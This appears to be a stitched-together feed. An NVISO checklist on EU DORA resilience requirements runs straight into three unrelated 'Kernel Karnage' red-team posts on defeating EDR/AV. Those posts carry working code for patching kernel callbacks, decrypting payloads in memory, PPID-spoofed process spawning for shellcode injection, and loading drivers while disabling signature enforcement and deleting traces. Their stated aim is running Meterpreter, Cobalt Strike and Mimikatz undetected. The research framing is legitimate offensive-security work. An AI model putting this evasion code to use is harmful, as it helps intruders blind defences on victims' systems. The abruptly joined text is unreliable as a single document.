Patching Entities shall have appropriate and comprehensive policies for patches and updates

What does this entail?

  • Ensuring the resilience, continuity and availability of ICT systems
  • Ensuring the security, confidentiality and integrity of data
  • Ensuring the continuous monitoring and control of ICT systems and tools
  • Defining and implementing Information security policies such as
    • Limit physical and virtual access to ICT systems
    • Protocols on strong authentication
    • Change management
    • Patching / updates management


Detection

Financial entities shall continuously monitor and promptly detect anomalous activities, threats and compromises of the ICT environment.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 9 Detection 
Detect anomalous activities Entities shall have in place mechanisms to promptly detect anomalous activities
(a) ICT network performance issues
(b) ICT-related incidents
Detect single points of failure Entities shall have in place mechanisms to identify all potential material single points of failure
Testing All detection mechanisms shall be regularly tested 
Alert mechanism All detection mechanisms shall enable multiple layers of control
(a) Define alert thresholds
(b) Define criteria to trigger ICT-related incident detection
(c) Define criteria to trigger ICT-related incident response processes
(d) Have automatic alert mechanisms in place for relevant staff in charge of ICT-related incident response. 
Trade reports checking Entities shall have in place systems that can effectively check trade reports for completeness, identify omissions and obvious errors and request re-transmission of any such erroneous reports. 

What does this entail?

  • Ensure the prompt detection of anomalous activities
  • Enforce multiple layers of control
  • Enable the identification of single points of failure

Response and recovery (including Backup policies and recovery methods)

Financial entities shall put in place dedicated and comprehensive business continuity policies and disaster and recovery plans to adequately react to identified security incidents and to ensure the resilience, continuity and availability of ICT systems.

The following table provides a checklist for financial entities to self-assess their compliance on Response and recovery requirements:

Article 10 Response and recovery 
ICT Business Continuity Policy  Entities shall put in place a dedicated and comprehensive ICT Business Continuity Policy as an integral part of the operational business continuity policy  of the entity
ICT Business Continuity Mechanisms Entities shall implement the ICT Business Continuity Policy through appropriate and documented arrangements, plans, procedures and mechanisms aimed at:
(a) recording all ICT-related incidents ;
(b) ensuring the continuity of the entity’s critical functions;
(c) quickly, appropriately and effectively responding to and resolving all ICT-related incidents
(d) activating without delay dedicated plans that enable containment measures, processes and technologies, as well as tailored response and recovery procedures 
(e) estimating preliminary impacts, damages and losses;
(f) setting out communication and crisis management actions which ensure that updated information is transmitted to all relevant internal staff and external stakeholders, and reported to competent authorities 
ICT Disaster Recovery Plan Entities shall implement an associated ICT Disaster Recovery Plan
ICT Disaster Recovery Audit Review Entities shall define a process for the ICT Disaster Recovery Plan to be subject to independent audit reviews.  
ICT Business Continuity Test  Entities shall periodically test the ICT Business Continuity Policy, at least yearly and after substantive changes to the ICT systems;
ICT Disaster Recovery Test Entities shall periodically test the ICT Disaster Recovery Plan, at least yearly and after substantive changes to the ICT systems;
Testing Plans Entities shall include in the testing plans scenarios of cyber-attacks and switchovers between the primary ICT infrastructure and the redundant capacity, backups and redundant facilities 
Crisis Communication Plans Entities shall implement a crisis communication plan
Crisis Communication Plans Test Entities shall periodically test the crisis communication plans, at least yearly and after substantive changes to the ICT systems;
Crisis Management Function Entities shall have a crisis management function, which, in case of activation of their ICT Business Continuity Policy or ICT Disaster Recovery Plan, shall set out clear procedures to manage internal and external crisis communications 
Records of Activities Entities shall keep records of activities before and during disruption events when their ICT Business Continuity Policy or ICT Disaster Recovery Plan is activated. 
ICT Business Continuity Policy Communication When implementing changes to the ICT Business Continuity Policy, entities shall communicate those changes to the competent authorities
Test Communication Entities shall define a process to provide to the competent authorities copies of the results of the ICT business continuity tests
Incident Communication Entities shall define a process to report to competent authorities all costs and losses caused by ICT disruptions and ICT-related incidents

The following table provides a checklist for financial entities to self-assess their compliance on Backup policies requirements:

Article 11 Backup policies and recovery methods 
Backup Policy Entities shall develop a backup policy
(a) specifying the scope of the data that is subject to the backup
(b) specifying the minimum frequency of the backup
(c) based on the criticality of information or the sensitiveness of the data
Backup Restoration When restoring backup data using own systems, entities shall use ICT systems that have an operating environment different from the main one, that is not directly connected with the latter and that is securely protected from any unauthorized access or ICT corruption
Recovery Plans Entities shall develop recovery plans which enable the recovery of all transactions at the time of disruption to allow the central counterparty to continue to operate with certainty and to complete settlement on the scheduled date
Recovery Methods Entities shall develop recovery methods to limit downtime and disruption
ICT third-party providers Continuity Entities shall ensure that their ICT third-party providers maintain at least one secondary processing site endowed with resources, capabilities, functionalities and staffing arrangements sufficient and appropriate to ensure business needs
ICT third-party providers secondary processing site Entities shall ensure that the ICT third-party provider secondary processing site is:
(a) located at a geographical distance from the primary processing site
(b) capable of ensuring the continuity of critical services identically to the primary site
(c) immediately accessible to the entity’s staff to ensure continuity of critical services 
Recovery time objectives Entities shall determine recovery time and point objectives for each function. Such time objectives shall ensure that, in extreme scenarios, the agreed service levels are met
Recovery checks When recovering from an ICT-related incident, entities shall perform multiple checks, including reconciliations, in order to ensure that the level of data integrity is of the highest level

How to meet compliance with the Response and Recovery requirements?

  • Define and implement an ICT Business Continuity Policy
  • Define and implement ICT Disaster Recovery Plans
  • Define and implement Back-up policies
  • Develop recovery methods
  • Determine flexible recovery time and point objectives for each function

Developing response and recovery strategies and plans adds an additional level of complexity, as it will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, as well as assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

Learning and evolving

Financial entities shall embed continuous learning and evolving in their internal processes, in the form of information gathering as well as post-incident review and analysis.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 12 Learning and evolving 
Risk landscape Entities shall gather information on vulnerabilities and cyber threats, ICT-related incidents, in particular cyber-attacks, and analyse their likely impacts on their digital operational resilience.
Post ICT-related incident reviews  Entities shall put in place post ICT-related incident reviews after significant ICT disruptions of their core activities
(a) analysing the causes of disruption
(b) identifying required improvements to the ICT operations or within the ICT Business Continuity Policy  
Post ICT-related incident reviews mechanism Entities shall ensure the post ICT-related incident reviews determine whether the established procedures were followed and the actions taken were effective, including:
(a) the promptness in responding to security alerts and determining the impact of ICT-related incidents and their severity;
(b) the quality and speed in performing forensic analysis;
(c) the effectiveness of incident escalation within the financial entity;
(d) the effectiveness of internal and external communication 
Lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests Entities shall derive lessons from the ICT Business Continuity and ICT Disaster Recovery tests. Lessons shall be duly incorporated on a continuous basis into the ICT risk assessment process
Lessons learned reporting Senior ICT staff shall report at least yearly to the management body on the findings derived from the lessons learned from the ICT Business Continuity and ICT Disaster Recovery tests
Monitor the effectiveness of the implementation of the digital resilience strategy Entities shall map the evolution of ICT risks over time, analyse the frequency, types, magnitude and evolution of ICT-related incidents, in particular cyber-attacks and their patterns, with a view to understand the level of ICT risk exposure and enhance the cyber maturity and preparedness of the entity
ICT security awareness programs  Entities shall develop ICT security awareness trainings as compulsory modules in their staff training schemes
Digital operational resilience training Entities shall develop ICT digital operational resilience trainings as compulsory modules in their staff training schemes 

What does this entail?

  • Ensure information gathering on vulnerabilities and cyber threats
  • Ensure post-incident reviews after significant ICT disruptions
  • Define a procedure for the analysis of causes of disruptions
  • Define a procedure for the reporting to the management body
  • Develop ICT security awareness programs and trainings

Developing ICT security awareness programs and trainings adds another level of complexity, as DORA introduces compulsory training on digital operational resilience not only for the management body, but also for the whole staff, as part of their general training package.


Communication

Financial entities shall define a communication strategy, plans and procedures for communicating ICT-related incidents to clients, counterparts and the public.

The following table provides a checklist for financial entities to self-assess their compliance on this requirement:

Article 13 Communication 
Clients and counterparts communication Entities shall have in place communication plans enabling a responsible disclosure of ICT-related incidents or major vulnerabilities to clients and counterparts as well as to the public, as appropriate. 
Staff communication Entities shall implement communication policies for staff and for external stakeholders.
(a) Communication policies for staff shall take into account the need to differentiate between staff involved in the ICT risk management, in particular response and recovery, and staff that needs to be informed. 
Mandate At least one person in the entity shall be tasked with implementing the communication strategy for ICT-related incidents and fulfil the role of public and media spokesperson for that purpose. 

What does this entail?

  • Develop communication plans to communicate to clients, counterparts and the public
  • Mandate at least one person to implement the communication strategy for ICT-related incidents

I hope you found this blogpost interesting.

Keep an eye out for the following parts! This blog post is part of a series. In the following blogposts, we will further explore the requirements associated with the Incident Management process, the Digital Operational Resilience Testing and the ICT Third-Party Risk Management of DORA.

About the Author

Nicolas is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into his technical hands-on experiences as well as his managerial academic background to help organisations build out their Cyber Security Strategy. He has a strong interest in IT management, Digital Transformation, Information Security and Data Protection. In his personal life, he likes adventurous vacations. He hiked several 4000+ summits around the world, and secretly dreams about one day hiking all of the top summits. In his free time, he is an academic teacher who has been teaching for 7 years at both the Solvay Brussels School of Economics and Management and the Brussels School of Engineering. 

Find out more about Nicolas on Linkedin.

Kernel Karnage – Part 6 (Last Call)

By: bautersj
9 December 2021 at 13:04

With the release of this blogpost, we’re past the halfway point of my internship; time flies when you’re having fun.

1. Introduction – Status Report

In the course of these 6 weeks, I’ve covered several aspects of kernel drivers and EDR/AV kernel mechanisms. I started off strong by examining kernel callbacks and why EDR/AV products use them extensively to gain visibility into what’s happening on the system. I confirmed these concepts by leveraging existing work against $vendor1 and successfully executing Mimikatz on the compromised system.

Then I took a step back and did a deep dive into the inner structure and workings of a kernel driver: how it communicates with other drivers and applications, and how I can intercept these communications using IRP MajorFunction hooks.

Once I had the basics sorted and got comfortable working with the kernel and a kernel debugger, I started developing my own driver called Interceptor, which has kernel callback patching and IRP MajorFunction hooking capabilities. I took the driver for a test drive against $vendor2 and concluded that attacking an EDR/AV product from kernel land alone is not sufficient and user land detection techniques should be taken into consideration as well.

To solve this problem, I then developed a custom shellcode injector using the EarlyBird technique, which combined with the Interceptor driver was able to partially bypass $vendor2 and launch a meterpreter session on the compromised system.

After this small success, I spent a good amount of time on code maintenance, refactoring, bug fixing and research, which has brought me to today’s blogpost. In this blogpost I would like to conclude the kernel callbacks, having solved my issues with registry and object callbacks, revisit the shellcode injector in a bit more detail and once more bring the fight to $vendor2. Let’s get to it, shall we?

2. Last call

Having covered process, thread and image callbacks in the previous blogposts, I think it’s only fair if we conclude this topic with registry and object callbacks. In the previous blogpost, I demonstrated how we can retrieve and enumerate the registry callback doubly linked list. The code to patch and subsequently restore these callbacks is almost identical, using the same iteration method. For the sake of simplicity, I decided to store the patched callbacks internally in an array of size 64, instead of another linked list.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; pEntry != (PLIST_ENTRY)callbackListHead; pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    auto callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
    PULONG64 pPointer = (PULONG64)callbackFuncAddr;

    //save the original instruction, used to restore the callback
    switch (callback) {
      case registry:
        g_CallbackGlobals.RegistryCallbacks[index].patched = true;
        memcpy(g_CallbackGlobals.RegistryCallbacks[index].instruction, pPointer, 8);
        break;
      default:
        return STATUS_NOT_SUPPORTED;
    }

    //patch the callback function with a RET (0xC3)
    *pPointer = (ULONG64)0xC3;
    return STATUS_SUCCESS;
  }
}

With the registry callbacks patched and taken care of, it’s time to jump the last hurdle, and it’s a big one: object callbacks. Out of all the kernel callbacks, object callbacks definitely gave me the most grief and I still don’t understand them 100%. There is only limited documentation out there, and most of it covers the object callbacks themselves and how to use them, not how to bypass or disable them. Nonetheless, I found a couple of good resources which I think are worth sharing:

2.1 What is this Object Callbacks black magic?

Object callbacks are called as a result of process / thread / desktop HANDLE operations. They can either be called before the operation takes place (POB_PRE_OPERATION_CALLBACK) or after the operation completes (POB_POST_OPERATION_CALLBACK). A good example is the OpenProcess() API call, which returns an open HANDLE to the target local process object if it succeeds. When OpenProcess() is called, a pre-operation callback can be triggered, and when OpenProcess() returns, a post-operation callback can be triggered.

Object callbacks only work on process objects, thread objects and desktop objects. The most common use case for these object callbacks is to modify the requested access rights to said object. If I were to attach a debugger to an EDR/AV process by using OpenProcess() with the PROCESS_ALL_ACCESS flag, the EDR/AV would most likely use an object callback to change the granted access rights to something like PROCESS_QUERY_LIMITED_INFORMATION to protect itself.

2.2 Where can I find one for myself?

I’m glad you asked! Turns out they’re a little bit harder to locate. Windows contains a very important structure called OBJECT_TYPE which is defined as:

typedef struct _OBJECT_TYPE {
  LIST_ENTRY TypeList;
  PVOID DefaultObject; 
  UCHAR Index;
  ULONG TotalNumberOfObjects;
  ULONG TotalNumberOfHandles;
  ULONG HighWaterNumberOfObjects;
  ULONG HighWaterNumberOfHandles;
  OBJECT_TYPE_INITIALIZER TypeInfo; //unsigned char TypeInfo[0x78];
  EX_PUSH_LOCK TypeLock;
  ULONG Key;
  LIST_ENTRY CallbackList; //offset 0xC8
} OBJECT_TYPE, *POBJECT_TYPE;

This structure is used to define the process and thread objects, which are the only two object types that allow callbacks on their creation and copying, and is stored in the global variables: **PsProcessType and **PsThreadType. It also contains a linked list entry LIST_ENTRY CallbackList, which points to a CALLBACK_ENTRY_ITEM structure defined as:

typedef struct _CALLBACK_ENTRY_ITEM {
	LIST_ENTRY EntryItemList;
	OB_OPERATION Operations;
	DWORD Active;
	POB_PRE_OPERATION_CALLBACK PreOperation; //offset 0x28
	POB_POST_OPERATION_CALLBACK PostOperation; //offset 0x30
	__int64 unk;
} CALLBACK_ENTRY_ITEM, *PCALLBACK_ENTRY_ITEM;

The POB_PRE_OPERATION_CALLBACK PreOperation and POB_POST_OPERATION_CALLBACK PostOperation members contain the function pointers to the registered callback routines.

2.3 Show me the code!

The above mentioned global variables **PsProcessType and **PsThreadType can be used to grab a POBJECT_TYPE struct, which contains the LIST_ENTRY CallbackList address at offset 0xC8.

PVOID* FindObRegisterCallbacksListHead(POBJECT_TYPE pObType) {
  //POBJECT_TYPE pObType = *PsProcessType;
	return (PVOID*)((__int64)pObType + 0xc8);
}

The CallbackList address can then be used to enumerate the linked list in a similar manner as the registry callback list and patch the pre- and post-operation callback function pointers. The pre- and post-operation callbacks are located at offsets 0x28 and 0x30 in the CALLBACK_ENTRY_ITEM structure.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)callbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    //grab pre-operation callback function address at offset 0x28
    auto preOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x28);
    if (MmIsAddressValid((PVOID*)preOpCallbackFuncAddr)) {

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)preOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][0].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][0].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      return STATUS_SUCCESS;
    }

    //grab post-operation callback function address at offset 0x30
    auto postOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x30);
    if (MmIsAddressValid((PVOID*)postOpCallbackFuncAddr)) {

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)postOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][1].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][1].instruction, pPointer, 8);
          break;
        default:
          return STATUS_NOT_SUPPORTED;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      return STATUS_SUCCESS;
    }
  }
}
Interceptor patch object callback
patched process object callback

3. Interceptor vs $vendor2: Round 2

In my previous attempt to bypass $vendor2 and run a meterpreter reverse TCP shell on the compromised system, the attack was detected, but not blocked. My EarlyBird shellcode injector used a staged payload to connect back to the metasploit framework and fetch the meterpreter payload, which then got flagged by $vendor2.

To try and solve this issue, I decided not to use a staged payload, but instead embed the whole meterpreter payload in the binary itself. Since the payload size is around 200,000 bytes, it is impractical at best to embed it as a hexadecimal string and it would get immediately flagged when any static analysis is performed. Instead, one of my colleagues, Firat Acar, suggested I could embed the payload as an encrypted resource and load and decrypt it at runtime in memory.

The code for this is surprisingly simple:

HRSRC scResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD1), L"payload");
DWORD scSize = SizeofResource(NULL, scResource);
HGLOBAL scResourceData = LoadResource(NULL, scResource);
LPVOID scData = LockResource(scResourceData); //get a pointer to the resource data

Once the resource is loaded, a function like memcpy() or NtWriteVirtualMemory() can be used to write it to memory. Once that’s done, it can be decrypted in memory using a simple XOR:

void XORDecryptInMemory(const char* key, int keyLen, int dataLen, LPVOID startAddr) {
	BYTE* t = (BYTE*)startAddr;

	for (DWORD i = 0; i < dataLen; i++) {
		t[i] ^= key[i % keyLen];
	}
}
Since my shellcode injector attempts to inject into a remote process, using this decrypt routine will cause a STATUS_ACCESS_VIOLATION exception, since directly accessing memory of a different process is not allowed. Instead, functions like NtReadVirtualMemory() and NtWriteVirtualMemory() should be used.

However, after testing this approach against $vendor2, the embedded resource got flagged almost immediately. Maybe a better encryption algorithm like RC4 or AES could work, but that also comes with a lot of overhead to implement.

A different solution to this problem might be to fetch the payload remotely using sockets, in an attempt to avoid using higher level APIs like WinINet. For now I reverted back to a staged payload embedded as a hexadecimal string.

With the ability to now patch all the kernel callbacks, I decided to try and bypass $vendor2 once more. I disabled its botnet protection module, which inspects network traffic for potentially malicious activity, since this is what flagged the meterpreter traffic in the first place. I wanted to see whether, apart from network packet inspection, $vendor2 would detect the meterpreter payload. Notably, when testing with an HTTPS implant, the botnet protection did not detect and block the payload.

4. Conclusion

This blogpost concludes patching the kernel callbacks. While there is more functionality to add and more problems to address from kernel space, such as ETW or minifilters, the main goal of sufficiently crippling an EDR/AV product using a kernel driver has been met. Using Interceptor, we can deploy a meterpreter shell or Cobalt Strike Beacon and even run Mimikatz undetected. The next challenge will be to deploy the driver on a target and bypass protections such as Driver Signature Enforcement.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 7 (Out of the Lab and Back to Reality)

By: bautersj
20 December 2021 at 13:49

This week I emerge from the lab and put on a different hat.

1. Switching hats

With Interceptor being successful in blinding $vendor2 sufficiently to run a meterpreter reverse shell, it is time to put on the red team hat and get out of the perfect lab environment. To do just that, I had to revert some settings I turned off at the beginning of this series.

First, I enabled Secure Boot and disabled test signing mode on the target VM. Secure Boot will enable Microsoft’s Driver Signature Enforcement (DSE) policy, which blocks non-WHQL-signed drivers from being loaded, which includes my Interceptor driver. It’s important to note I left HyperGuard (HVCI) turned off, because I currently have no way of defeating Virtualization-based protection.

With the target configured, I then set up a Cobalt Strike Teamserver using a Gmail Malleable C2 profile and configured my EarlyBird shellcode injector to deliver an HTTPS Beacon. My idea was to simulate a scenario where an attacker (me) had managed to gain a foothold on the target and obtained an implant with elevated privileges. The attacker would then use the implant to disable DSE on the compromised system and load the Interceptor driver, all directly in memory to keep a low footprint. Once Interceptor has been loaded on the target system, it would cripple the EDR/AV product and allow the attacker to run Mimikatz undetected.

Naturally, nothing ever goes as planned.

2. Outspoofing myself

The first issue I ran into was executing my shellcode injector with elevated privileges. No matter what I tried, I couldn’t seem to get a Beacon callback with elevated privileges, so I took my issue to infosec Twitter and unmasked the culprit with the help of @trickster012.

The code responsible for spawning a new spoofed process, which is then used to inject the Beacon payload into, looks like this:

    //do dynamic imports
    hK32 = GetModuleHandleA("kernel32");
    FARPROC fpInitializeProcThreadAttributeList = GetProcAddress(hK32, "InitializeProcThreadAttributeList");
    _InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (_InitializeProcThreadAttributeList)fpInitializeProcThreadAttributeList;
    FARPROC fpUpdateProcThreadAttribute = GetProcAddress(hK32, "UpdateProcThreadAttribute");
    _UpdateProcThreadAttribute UpdateProcThreadAttribute = (_UpdateProcThreadAttribute)fpUpdateProcThreadAttribute;
    FARPROC fpDeleteProcThreadAttributeList = GetProcAddress(hK32, "DeleteProcThreadAttributeList");
    _DeleteProcThreadAttributeList DeleteProcThreadAttributeList = (_DeleteProcThreadAttributeList)fpDeleteProcThreadAttributeList;

    SIZE_T attributeSize;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    //first call intentionally fails and returns the required buffer size
    InitializeProcThreadAttributeList(NULL, 2, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attributeSize);

    //enable CIG: only allow Microsoft-signed DLLs in the child process
    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
    //PPID spoof: set parentHandle as parent process
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentHandle, sizeof(HANDLE), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    //create the suspended target process (creation flags reconstructed, assumed)
    //targetProcess: path to the target executable, defined elsewhere
    if (!CreateProcessA(NULL, targetProcess, NULL, NULL, FALSE,
        EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED | CREATE_NO_WINDOW,
        NULL, NULL, &si.StartupInfo, &pi))
        throw "";

    std::cout << "Process created!" << " PID: " << pi.dwProcessId << "\n";

    DeleteProcThreadAttributeList(si.lpAttributeList);

    return pi;

The Spawn() function takes a parameter HANDLE parentHandle, which is used to set the parent process of the newly created process. The handle would in this case point to explorer.exe as this is the process I was spoofing. @CaptMeelo recently posted a great blogpost titled Picky PPID Spoofing which covers the topic of PPID spoofing quite well.

To make a long story short, as stated in the Microsoft documentation, the to-be-created process inherits certain attributes from its parent process (the one we're spoofing); these attributes happen to include the process token. One of the many things contained in a token are the privileges held by the user or the user's group that are associated with the process.

Parent process attributes

If we take a look at explorer.exe in Process Hacker we can see the associated user and token. We can also see that the process is not running in elevated context. Taking into consideration the attribute inheritance, it makes sense that I couldn’t manage to spawn an elevated process with explorer.exe set as parent.

Explorer.exe process hacker

With this issue identified and remediated, I ran head first into the next one: concealing Beacon from EDR/AV. My shellcode injector is still configured to use embedded shellcode instead of pulling a payload from somewhere else. So far this has worked quite well with stageless payloads. I replaced the meterpreter payload with one of Cobalt Strike’s stagers, which would then pull a full HTTPS Beacon payload. I have not (yet) modified Beacon, so once the stager pulls the payload, EDR/AV detects a Cobalt Strike artifact in memory and takes action. Uh oh, not good. As of writing this blogpost, I have not yet figured out the answer to this problem; if any readers have suggestions, you’re more than welcome to share them with me on Twitter.

3. Disabling Driver Signature Enforcement (DSE)

Instead, I decided to move on to the task at hand: disabling driver signature enforcement (DSE) on the target and loading Interceptor. Over the course of my research I stumbled across Kernel Driver Utility (KDU), a tool developed by @hfiref0x. One of the many wondrous things this tool can do is disable Driver Signature Enforcement (DSE). It does this by loading a WHQL-signed driver with an arbitrary kernel memory read/write vulnerability to change the state of nt!g_CiEnabled in ntoskrnl.exe or g_CiOptions in CI.dll, depending on the build version of Windows.

I tested KDU and it worked well, except it didn’t tick all the boxes required for the scenario:

  1. It got flagged by EDR/AV
  2. It cannot be executed in memory from a Beacon

What I need is a custom Beacon Object File (BOF) whose only purpose is to disable DSE and load Interceptor, or any other malicious driver for that matter. Windows provides APIs like NtLoadDriver() and NtUnloadDriver() to handle loading drivers programmatically; there’s just one catch: drivers cannot be loaded from memory, they need to touch disk, which is not good for OPSEC. To be fair, this statement is not 100% correct though, because there are ways to manually map drivers into memory, however they come with a lot of drawbacks like:

  • Invalid DeviceObject and RegistryPath objects
  • No Structured Exception Handling (SEH)
  • Cannot be unloaded, so they persist until reboot
  • Only ntoskrnl.exe imports are resolved
  • Cannot use certain kernel primitives like callbacks because of PatchGuard

I won’t go into much detail here, but manually mapping comes with so much overhead and instability that it is out of the equation (until I get bored). So instead, I’ll have to sacrifice some OPSEC and touch disk for a safer and more stable result. I’m currently developing a BOF to disable DSE using CVE-2015-2291, which will also be integrated in my CobaltWhispers framework for Cobalt Strike, which I just updated to use SysWhispers2 and InlineWhispers2 to dynamically resolve direct syscalls.

Disable DSE

4. Conclusion

With the release of this blogpost, the kernel driver Interceptor is nearly complete in functionality and is able to fulfill its purpose. Writing tools wouldn’t be very useful if they didn’t work outside of a lab environment, and not all of us have magical access to code signing certificates and administrator privileges in a target environment. I spent a good amount of time uncovering new and different hurdles that come with the scenario I presented, and subsequently tried to find solutions to them. I guess it goes to show that most challenges in remaining undetected and bypassing EDR/AV still present themselves in user space and have to be addressed as such.

Besides the challenges in user space, there are still several kernel space aspects I want to look at in upcoming blogposts if the time permits. These include:

  • disabling Sysmon and Event Tracing for Windows (ETW)
  • hooking minifilters
  • inspecting and filtering IRPs

But as with everything, time flies by when one’s having fun 😉


Kernel Karnage – Part 8 (Getting Around DSE)

By: bautersj
10 January 2022 at 08:00

When life gives you exploits, you turn them into Beacon Object Files.

1. Back to BOFs

I never thought I would say this, but after spending so much time in kernel land, it’s almost as if developing kernel functionality is easier than writing user land applications, especially when they need to fly under the radar. As I mentioned in my previous blogpost, I am in dire need of a Beacon Object File to disable Driver Signature Enforcement (DSE) from memory. However, writing a BOF with such complex functionality results in a lot of code and is hard to test and debug, especially when also using direct syscalls. So I decided to first write a regular C/C++ console application which should do exactly the same, except for the integration part with CobaltWhispers, which takes care of the payload.

2. May I load drivers, please?

The first task at hand is making sure the current process context we’re in has sufficient privileges to load or unload a driver. By default, even in elevated context, the required privilege SeLoadDriverPrivilege is disabled.

SeLoadDriverPrivilege disabled

Luckily, changing the privileges isn’t too difficult. At boot time, each privilege is assigned a locally unique identifier (LUID). Using the LookupPrivilegeValue() function, the LUID associated with SeLoadDriverPrivilege can be retrieved and passed to NtAdjustPrivilegesToken() together with the SE_PRIVILEGE_ENABLED flag.

LUID luid;
HANDLE hToken;
TOKEN_PRIVILEGES tp;

status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);

LookupPrivilegeValue(nullptr, L"SeLoadDriverPrivilege", &luid);

tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

NtAdjustPrivilegesToken(hToken, FALSE, &tp, 0, nullptr, 0);

SeLoadDriverPrivilege enabled

3. Down to business

Once the privileges are sorted, we can move on to the next step, which is creating the necessary registry key and its values. When a driver is loaded using the NtLoadDriver() API, a registry key is passed as a parameter. This registry key is necessary because it contains the location of the driver on disk (this is why we need to touch disk to load a driver), as well as a couple of other values indicating the type of driver, the error handling when the driver fails to start, and when in the boot sequence the driver should be started.
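For reference, the resulting service key under HKLM\SYSTEM\CurrentControlSet\Services would look roughly like this (the driver name and path are hypothetical; the numeric values are the typical ones for a demand-start kernel driver):

```
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Interceptor]
"ImagePath"    = "\??\C:\Windows\System32\drivers\Interceptor.sys"   ; REG_EXPAND_SZ
"Type"         = 1   ; SERVICE_KERNEL_DRIVER
"Start"        = 3   ; SERVICE_DEMAND_START
"ErrorControl" = 1   ; SERVICE_ERROR_NORMAL
```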

Creating registry keys is nothing new:

ULONG disposition;
DWORD keyValue;
RtlInitUnicodeString(&keyName, KeyName);

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NtCreateKey(&hKey, KEY_ALL_ACCESS, &oa, 0, nullptr, REG_OPTION_NON_VOLATILE, &disposition);

keyValue = SERVICE_ERROR_NORMAL; // 1: log the error and continue booting
RtlInitUnicodeString(&keyValueName, L"ErrorControl");
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

keyValue = SERVICE_KERNEL_DRIVER; // 1: kernel device driver
RtlInitUnicodeString(&keyValueName, L"Type");
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

keyValue = SERVICE_DEMAND_START; // 3: load on demand via NtLoadDriver
RtlInitUnicodeString(&keyValueName, L"Start");
NtSetValueKey(hKey, &keyValueName, 0, REG_DWORD, (BYTE*)&keyValue, sizeof(keyValue));

RtlInitUnicodeString(&keyValueName, L"ImagePath");
RtlInitUnicodeString(&DriverImagePath, DriverPath);
NtSetValueKey(hKey, &keyValueName, 0, REG_EXPAND_SZ, (BYTE*)DriverImagePath.Buffer, DriverImagePath.Length + sizeof(UNICODE_NULL));

The registry key has been successfully created and the ImagePath value points to the driver on disk.

Driver registry entrance

The registry key can then be passed to NtLoadDriver(), which will read the driver from disk and load it into memory. Once the driver is no longer needed, it can be unloaded by passing the same registry key to NtUnloadDriver(). For OPSEC considerations, once the driver is unloaded from the system, the registry key and binary on disk should also be removed, which is relatively easy with calls to NtOpenKeyEx(), NtDeleteKey() and NtDeleteFile().

//do stuff

InitializeObjectAttributes(&oa, &keyName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
NtOpenKeyEx(&hKey, DELETE, &oa, 0);
NtDeleteKey(hKey);

